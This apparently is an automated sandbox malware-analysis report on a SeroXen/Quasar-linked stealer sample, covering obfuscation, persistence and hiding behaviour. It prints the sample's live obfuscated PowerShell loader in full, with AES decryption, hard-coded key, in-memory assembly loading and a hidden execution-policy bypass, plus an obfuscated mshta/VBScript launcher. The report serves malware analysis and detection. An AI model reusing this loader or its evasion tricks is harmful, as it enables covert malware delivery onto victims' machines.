            Source: Binary string: C:\Users\C5\Documents\SeroXen Stuff\Quasar-master\Quasar-master-release\bin\Release\net452\REPOS\seroxen rootkit stuff\InstallStager\bin\Release\InstallStager.pdb source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.dxgi.pdb.compressed|||SharpDX.DXGI.pdb|D73E59804E3EE494A4612185771F7F67B2FD64AE|34752 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mshta.pdbGCTL source: $sxr-mshta.exe, 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe, 0000000A.00000000.2355999536.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe.3.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yApVCRtJPjQJu.exe, 0000002A.00000002.3355364200.000000000083E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: costura.costura.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.pdb.compressed|||SharpDX.pdb|1A7C10AA582CCEEBFFD9BC77A11353AAAE6417E9|42824 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: cmd.pdbUGP source: $sxr-cmd.exe, 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe, 0000000D.00000000.2370623512.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe.3.dr
            Source: Binary string: #costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed|||SharpDX.Direct3D11.pdb|A2259A45EA284247B3AA65EC9C1DBEBD47FE208F|78220 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: powershell.pdbUGP source: Shadow-Stealer.bat.exe, 00000003.00000000.2146647550.00007FF6BFFCA000.00000002.00000001.01000000.00000003.sdmp, Shadow-Stealer.bat.exe.0.dr, $sxr-powershell.exe.3.dr
            Source: Binary string: powershell.pdb source: Shadow-Stealer.bat.exe, 00000003.00000000.2146647550.00007FF6BFFCA000.00000002.00000001.01000000.00000003.sdmp, Shadow-Stealer.bat.exe.0.dr, $sxr-powershell.exe.3.dr
            Source: Binary string: costura.sharpdx.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: $sxr-powershell.exe, 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: cmd.pdb source: $sxr-cmd.exe, 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe, 0000000D.00000000.2370623512.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp, $sxr-cmd.exe.3.dr
            Source: Binary string: )costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: mshta.pdb source: $sxr-mshta.exe, 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe, 0000000A.00000000.2355999536.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp, $sxr-mshta.exe.3.dr

            Data Obfuscation

            Source: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe Unpacked PE file: 42.2.yApVCRtJPjQJu.exe.2930000.6.unpack
            Source: Yara match, file source: 15.2.$sxr-powershell.exe.1facccc4e50.31.raw.unpack, type: UNPACKEDPE
            Source: Yara match, file source: 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, file source: Process Memory Space: $sxr-powershell.exe PID: 6400, type: MEMORYSTR
            Source: 15.2.$sxr-powershell.exe.1facd0fdc88.20.raw.unpack, DynamicUtils.cs .Net Code: CreateSharpArgumentInfoArray
            Source: 15.2.$sxr-powershell.exe.1facd0fdc88.20.raw.unpack, LateBoundReflectionDelegateFactory.cs .Net Code: CreateDefaultConstructor
            Source: C:\Windows\$sxr-powershell.exe Anti Malware Scan Interface: Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.Ciphe
            Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 
-join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8
            Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join 
'')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYB
            Source: unknown Process created: C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
            Source: C:\Windows\$sxr-mshta.exe Code function: 10_2_000001ACE901870D push rcx; retf 003Fh 10_2_000001ACE901870E
            Source: C:\Windows\$sxr-mshta.exe Code function: 10_2_000001ACEA2E950D push rcx; retf 003Fh 10_2_000001ACEA2E950E
            Source: C:\Windows\$sxr-cmd.exe Code function: 13_2_000002155A59870D push rcx; retf 003Fh 13_2_000002155A59870E
            Source: C:\Windows\$sxr-cmd.exe Code function: 13_2_000002155A5C950D push rcx; retf 003Fh 13_2_000002155A5C950E
            Source: C:\Windows\$sxr-powershell.exe Code function: 19_2_000001F5FDC5870D push rcx; retf 003Fh 19_2_000001F5FDC5870E
            Source: C:\Windows\$sxr-powershell.exe Code function: 19_2_000001F5FDC8950D push rcx; retf 003Fh 19_2_000001F5FDC8950E
            Source: C:\Windows\System32\winlogon.exe Code function: 22_2_000002D01659870D push rcx; retf 003Fh 22_2_000002D01659870E
            Source: C:\Windows\System32\winlogon.exe Code function: 22_2_000002D0165F950D push rcx; retf 003Fh 22_2_000002D0165F950E
            Source: C:\Windows\System32\winlogon.exe Code function: 22_2_000002D01662870D push rcx; retf 003Fh 22_2_000002D01662870E
            Source: C:\Windows\System32\winlogon.exe Code function: 22_2_000002D01668870D push rcx; retf 003Fh 22_2_000002D01668870E
            Source: C:\Windows\System32\winlogon.exe Code function: 22_2_000002D0166E870D push rcx; retf 003Fh 22_2_000002D0166E870E
            Source: C:\Windows\System32\winlogon.exe Code function: 22_2_000002D01674870D push rcx; retf 003Fh 22_2_000002D01674870E
            Source: C:\Windows\System32\winlogon.exe Code function: 22_2_000002D0167A870D push rcx; retf 003Fh 22_2_000002D0167A870E
            Source: C:\Windows\System32\lsass.exe Code function: 24_2_000002D6F14F870D push rcx; retf 003Fh 24_2_000002D6F14F870E
            Source: C:\Windows\System32\lsass.exe Code function: 24_2_000002D6F152950D push rcx; retf 003Fh 24_2_000002D6F152950E
            Source: C:\Windows\System32\svchost.exe Code function: 25_2_0000014E41FB870D push rcx; retf 003Fh 25_2_0000014E41FB870E
            Source: C:\Windows\System32\svchost.exe Code function: 25_2_0000014E41FE950D push rcx; retf 003Fh 25_2_0000014E41FE950E
            Source: C:\Windows\System32\dwm.exe Code function: 26_2_000001D15B47870D push rcx; retf 003Fh 26_2_000001D15B47870E
            Source: C:\Windows\System32\dwm.exe Code function: 26_2_000001D15B4A950D push rcx; retf 003Fh 26_2_000001D15B4A950E
            Source: C:\Windows\System32\dwm.exe Code function: 26_2_000001D15CAE870D push rcx; retf 003Fh 26_2_000001D15CAE870E
            Source: C:\Windows\System32\dwm.exe Code function: 26_2_000001D15CB4870D push rcx; retf 003Fh 26_2_000001D15CB4870E
            Source: C:\Windows\System32\dwm.exe Code function: 26_2_000001D15CBA870D push rcx; retf 003Fh 26_2_000001D15CBA870E
            Source: C:\Windows\System32\dwm.exe Code function: 26_2_000001D15CC0870D push rcx; retf 003Fh 26_2_000001D15CC0870E
            Source: C:\Windows\$sxr-mshta.exe Code function: 10_2_00007FF64E1D1008 GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,UnregisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey, 10_2_00007FF64E1D1008
            Source: Shadow-Stealer.bat.exe.0.dr Static PE information: 0x7EDA4115 [Wed Jun 10 07:45:25 2037 UTC]
            Source: $sxr-cmd.exe.3.dr Static PE information: section name: .didat

            Persistence and Installation Behavior

            Source: C:\Windows\$sxr-mshta.exe Executable created and started: C:\Windows\$sxr-cmd.exe
            Source: C:\Windows\$sxr-powershell.exe Executable created and started: C:\Windows\$sxr-powershell.exe
            Source: unknown Executable created and started: C:\Windows\$sxr-mshta.exe
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe File created: C:\Windows\$sxr-cmd.exe
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe File created: C:\Windows\$sxr-powershell.exe
            Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\Desktop\Shadow-Stealer.bat.exe
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe File created: C:\Windows\$sxr-mshta.exe

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe File deleted: c:\users\user\desktop\shadow-stealer.bat
            Source: C:\Windows\$sxr-powershell.exe File opened: C:\Windows\$sxr-powershell.exe:Zone.Identifier read attributes | delete
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-mshta.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
